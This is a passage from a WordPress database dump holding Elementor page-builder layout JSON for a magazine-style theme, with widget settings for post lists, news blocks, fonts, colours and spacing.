"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1275,454,'_elementor_version','0.4'),(1276,454,'_elementor_css','a:3:{s:4:\"time\";i:1508893778;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1278,455,'_elementor_edit_mode','builder'),(1279,455,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"zys1p12\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"mezoni7\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_